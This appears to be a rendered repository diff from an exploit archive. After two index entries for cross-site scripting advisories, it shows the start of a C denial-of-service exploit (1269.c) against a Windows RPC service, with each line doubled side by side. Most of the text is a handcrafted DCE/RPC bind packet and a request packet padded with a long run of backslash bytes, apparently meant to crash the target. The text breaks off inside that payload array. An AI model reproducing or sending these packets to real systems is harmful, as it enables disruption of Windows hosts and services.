28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0 28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0
28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0 28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0

Can't render this file because it is too large.

432
platforms/windows/dos/1269.c
View file

@ -1,216 +1,216 @@
#include <stdio.h> #include <stdio.h>
#include <windows.h> #include <windows.h>
#pragma comment(lib, "mpr") #pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4") #pragma comment(lib, "Rpcrt4")
unsigned char szBindString[] = unsigned char szBindString[] =
{ {
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b, 0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00, 0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00 0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
}; };
unsigned char szRequestString[] = unsigned char szRequestString[] =
{ {
0x05,0x00, 0x05,0x00,
0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08, 0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08,
0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x04,0x00,0x00,0x48,0x00,0x54,0x00,0x52,0x00,0x45,0x00,0x45,0x00, 0x00,0x00,0x00,0x04,0x00,0x00,0x48,0x00,0x54,0x00,0x52,0x00,0x45,0x00,0x45,0x00,
0x5c,0x00,0x52,0x00,0x4f,0x00,0x4f,0x00,0x54,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x52,0x00,0x4f,0x00,0x4f,0x00,0x54,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
